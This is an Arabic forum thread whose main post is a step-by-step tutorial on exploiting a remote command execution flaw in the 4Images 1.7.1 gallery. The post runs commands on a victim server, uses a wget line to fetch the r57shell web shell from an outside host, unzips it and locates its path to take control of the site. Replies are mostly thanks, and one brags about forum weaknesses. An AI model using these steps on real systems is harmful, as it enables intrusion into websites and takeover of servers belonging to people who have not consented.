إعـــــــلان

تقليص

قوانين منتديات أحلى قلب

قوانين خاصة بالتسجيل
  • [ يمنع ] التسجيل بأسماء مخلة للآداب أو مخالفة للدين الإسلامي أو مكررة أو لشخصيات معروفة.
  • [ يمنع ] وضع صور النساء والصور الشخصية وإن كانت في تصاميم أو عروض فلاش.
  • [ يمنع ] وضع روابط لايميلات الأعضاء.
  • [ يمنع ] وضع أرقام الهواتف والجوالات.
  • [ يمنع ] وضع روابط الأغاني أو الموسيقى في المنتدى .
  • [ يمنع ] التجريح في المواضيع أو الردود لأي عضو ولو كان لغرض المزح.
  • [ يمنع ] كتابة إي كلمات غير لائقة ومخلة للآداب.
  • [ يمنع ] نشر عناوين أو وصلات وروابط لمواقع فاضحة أو صور أو رسائل خاصة لا تتناسب مــع الآداب العامة.
  • [ يمنع ] الإعــلان في المنتدى عن أي منتج أو موقع دون الرجوع للإدارة.

شروط المشاركة
  • [ تنويه ]الإلتزام بتعاليم الشريعة الاسلامية ومنهج "اهل السنة والجماعة" في جميع مواضيع المنتدى وعلى جميع الإخوة أن يتقوا الله فيما يكتبون متذكرين قول المولى عز وجل ( ما يلفظ من قول إلا لديه رقيب عتيد)
    وأن يكون هدف الجميع هو قول الله سبحانه وتعالى (إن أريد إلا الإصلاح ما استطعت).
  • [ يمنع ] الكتابة عما حرم الله عز وجل وسنة النبي محمد صلي الله عليه وسلم .
  • [ يمنع ] التعرض لكل ما يسىء للديانات السماوية أي كانت أو ما يسيء لسياسات الدول .
  • [ يمنع ] عرض الإيميلات في المواضيع والردود .
  • [ يمنع ] التدخل في شؤون إدارة الموقع سواء في قراراتها أو صلاحيتها أو طريقة سياستها .
  • [ يمنع ] الإستهزاء بالمشرفين أو الإدارة بمجملها .
  • [ يمنع ] التعرض لأي شخص بالإهانة أو الإيذاء أو التشهير أو كتابة ما يتعارض مع القوانين المتعارف عليها .
  • [ يمنع ] التسجيل في المنتديات لهدف طرح إعلانات لمواقع أو منتديات أخرى .
  • [ يمنع ] طرح أي شكوى ضد أي مشرف أو عضو علناً ، و في حال كان لا بد من الشكوى .. راسل المدير العام من خلال رسالة خاصة .
  • [ يمنع ] استخدام الرسائل الخاصة لتبادل الكلام المخل للآداب مثل طلب التعارف بين الشباب و الفتيات أو الغزل وإن إكتشفت الإدارة مثل هذه الرسائل سوف يتم إيقاف عضوية كل من المُرسِل والمُرسَل إليه ما لم يتم إبلاغ المدير العام من قبل المُرسَل إليه والرسائل الخاصة وضعت للفائدة فقط .
  • [ يجب ] احترام الرأي الآخر وعدم التهجم على الأعضاء بأسلوب غير لائق.
  • عند كتابة موضوع جديد يرجى الابتعاد عن الرموز والمد الغير ضروري مثل اأآإزيــــآء هنـــديـــه كـــيـــوووت ~ يجب أن تكون أزياء هندية كيوت
  • يرجى عند نقل موضوع من منتدى آخر تغيير صيغة العنوان وتغيير محتوى الأسطر الأولى من الموضوع

ضوابط استخدام التواقيع
  • [ يمنع ] وضع الموسيقى والأغاني أو أي ملفات صوتية مثل ملفات الفلاش أو أي صور لا تتناسب مع الذوق العام.
  • [ يجب ] أن تراعي حجم التوقيع , العرض لا يتجاوز 550 بكسل والارتفاع لا يتجاوز 500 بكسل .
  • [ يمنع ] أن لا يحتوي التوقيع على صورة شخصية أو رقم جوال أو تلفون أو عناوين بريدية أو عناوين مواقع ومنتديات.
  • [ يمنع ] منعاً باتاً إستخدام الصور السياسية بالتواقيع , ومن يقوم بإضافة توقيع لشخصية سياسية سيتم حذف التوقيع من قبل الإدارة للمرة الأولى وإذا تمت إعادته مرة أخرى سيتم طرد العضو من المنتدى .

الصورة الرمزية للأعضاء
  • [ يمنع ] صور النساء المخلة بالأدب .
  • [ يمنع ] الصور الشخصية .

مراقبة المشاركات
  • [ يحق ] للمشرف التعديل على أي موضوع مخالف .
  • [ يحق ] للمشرف نقل أي موضوع إلى قسم أخر يُعنى به الموضوع .
  • [ يحق ] للإداريين نقل أي موضوع من منتدى ليس من إشرافه لأي منتدى أخر إن كان المشرف المختص متغيب .
  • [ يحق ] للمشرف حذف أي موضوع ( بنقلة للأرشيف ) دون الرجوع لصاحب الموضوع إن كان الموضوع مخالف كلياً لقوانين المنتدى .
  • [ يحق ] للمشرف إنـذار أي عضو مخالف وإن تكررت الإنذارات يخاطب المدير العام لعمل اللازم .

ملاحظات عامة
  • [ يمنع ] كتابة مواضيع تختص بالوداع أو ترك المنتدى وعلى من يرغب في ذلك مخاطبة الإدارة وإبداء الأسباب.
  • [ تنويه ] يحق للمدير العام التعديل على كل القوانين في أي وقت.
  • [ تنويه ] يحق للمدير العام إستثناء بعض الحالات الواجب طردها من المنتدى .

تم التحديث بتاريخ 19\09\2010
شاهد أكثر
شاهد أقل

طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,خلص المنتدى انضرب

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,خلص المنتدى انضرب


    الـسلام عليكم ورحمـة الله وبــركاته

    بندخل بالموضوع بدون مقدمات ( بالعربي ماعندي شي اقوله ) :D

    طيب اول شي كيف تعرف انها php ?

    بتـلقاء اول الكـود حق الثغـره مكتـوب كذا

    كود PHP:
    <?php
    طيـب آستغلال الثغـرات هذي تـحفظهـا بآمتداد php وتـرفعه على موقـع , مثـل ليوكس او غيره ,

    طيـب بناخـذ ثغرة

    كود:

    4Images <= 1.7.1 remote commands execution through arbitrary local



    الثــغره في البــوٍوٍم الصـور 4Images الاصــدار : 1.7.1

    طيــب هــذآ سورس الثغــره الي نـزل في مـواقع السكـيورتي ,



    زي ماشفنـا في بـداية الكـود <?php اوكـ, الحـين احـفظ الثغـره في جهـازك وانا سميتها كذا saudi.php

    لاحظ الامتداد الي حطـيته php ورح ارفــعها على موقع يقبل هالامتــداد , وانـا رفعتـها على مـوقع وهـذا رابط الثغـره ,



    طبـعا الطـلبات واضـحه ,,

    اول خيــآر : رابــط المـوقع واحط مثــال هو , www.sitename.com

    ثــآني خيآر : آســم المجلد ع المـوٍوٍقـع , وحــاط مثـال هو /4images/ or just او غيـره

    ثـالث خيـآر : (آمــر لينكس او ويندوز) وحــاط مثال هـو specify a command ("cat config.php" ,

    وامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يآخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع هالنظام ,


    طبعا احنا اخذنا الخيارات المهمه اول ثلاث خيارات الي حـاط عليــها * نجمه ,

    طيب بنطـبق على مـوقع مصـاب ونــشوف



    زي ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها ,




    وهـذي هي المـلفات طيــب الحيـن نشوفلنا ملف تصريحه 777 ومـلف data تصريحه 777 زي مانشـوف في الصوره

    بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget

    يعنــي تقــدر تـرفع طيب تمـام الحيــن نرفع لنـا شل ,



    زي ماشفــناء في الصـوره كتـبت كـذا

    كود:

    wget http://www.web4new.com/gallery/r57shell.zip


    wget = آمــر الرفع والرابــط رآبـط الشل ,

    وآظغــط (GO)

    طـيب الحيــن عشــان تتآكد انه ارتـــفع روح واكتـب الامر ls -l وبتـشوفه مع المـلفات ,



    كـل شي تمام طيب الحين تفـك الظغـط عن الشـل ,




    unzip = امـر فك الظـغط

    r57shell.zip = المـلف الي رفعناه ,



    ولاحـظ الصوره بعد ماظغطنــاء go , فـك الظغـط , وطـلع الملف r57shell.php ,

    وهــذي صـوره توضــح ..



    خــلاص الحـين كل شي تــمام تشــوف مســارك ويـن ,



    pwd : امـر يحدد مسـارك ع السيرفر ,



    زي ماشفـنا في الصــوره عطانا المسـار الي احنـاء فيه ,

    كود:

    /home/mubailes/public_html/main


    فــي المجلد الرئيسي تبع الموقع في مجلد main يعني هنا بيكون الشل

    www.xxxx.com/main/r57shell.php ,

    وهــذي الصــوره بعد دخــولنا ع الشــل ,



    وهي ان شاء الله نكون عـرٍرٍفنا كيف نستغـل ثغـرات الـ php واخذنـا الثغـره هذي كمثــال ,
    واكيــد كل ثغـره يفرق استثماره عن الثاني وان شاء الله يكون الـدرس واضـح

    وأن شاء الله تكون حماية php با المنتدى قويه
    تقبلو أحترامي


    فــــــــــــتــ:in_love:ى الاحــــــــــــــلام

  • #2
    هههههههههههههههههههههههه


    يلا اضرب المنتدي جرب


    ومالو

    مشكور اخي للمعلومات الرائعه والمميزه

    تعليق


    • #3
      صحيح

      ثغرات php قوية وفعالة

      لكن ..

      ما في شي الا والو حل

      وهالثغرة كل الكلمات المستخدمة فيها ممنوعة :)

      بس تقدر تزرع شيل بصورة وترفعو بامتدادا php

      لكن هالايام السيرفرات فيها حماية كافية للتغلب على هالثغرات

      عموما يعطيك العافية وما قصرت

      تقبل مروري
      Arabic Films - English Filmes - Islamic - Games - WWE - Sports - Anime - Programs - Other > A7laQalb.CoM


      للمراسلة والاستفسار : webmaster@a7laqalb.com

      تعليق


      • #4
        شكرا الك اخي المدير العام
        انتو اهلي بالمنتدى
        يعني انا ازاي اضرب
        قلبي واعيش بعدها ازاي
        مشكوووووور اخي على مرورك الطيب
        اميروو


        فــــــــــــتــ:in_love:ى الاحــــــــــــــلام

        تعليق


        • #5
          مشكور اخى لكل جديد

          تعليق


          • #6
            يسلمو اخي عالمعلومات

            تقبل مروري بصفحتك

            دمت بود

            احترامي

            .,

            سـ أكْتفي بـ الصّمْت و حسبْ !

            ,.

            تعليق


            • #7
              أتعلم اخي العزيز بأن ثغرات php ليست با الخطيره كباقي الثغرات
              اعطيك ثغرات داخل المنتدى هنا
              أولا
              ظهور الادمن والادمن (س)
              ثانيا المتواجودن حاليا
              ثالثا الاعضاء ثغره رائعه لمجال الهكر
              رابعا التقاويم داخل المنتدى
              وهناك شرح مفصل عن كل ها الحكي بدراستنا

              تعليق


              • #8
                مشكوووووووووووووووور اخي على معلوماتك الطيبة
                ومشكووور على مرورك الطيب
                اميروو
                دمت بود


                فــــــــــــتــ:in_love:ى الاحــــــــــــــلام

                تعليق


                • #9
                  رد: طـريقة استغـلال ثغـرات الـ php مـع التطبيق ,خلص المنتدى انضرب

                  [FONT="<a href="javascript://">Arial Narrow</a>"]جميل جدا


                  Buffer Overflow Exploit


                  والسيرفرات
                  هل الايام قوى وصعب اخترقها

                  تحياتى
                  [/FONT]

                  تعليق

                  يعمل...
                  X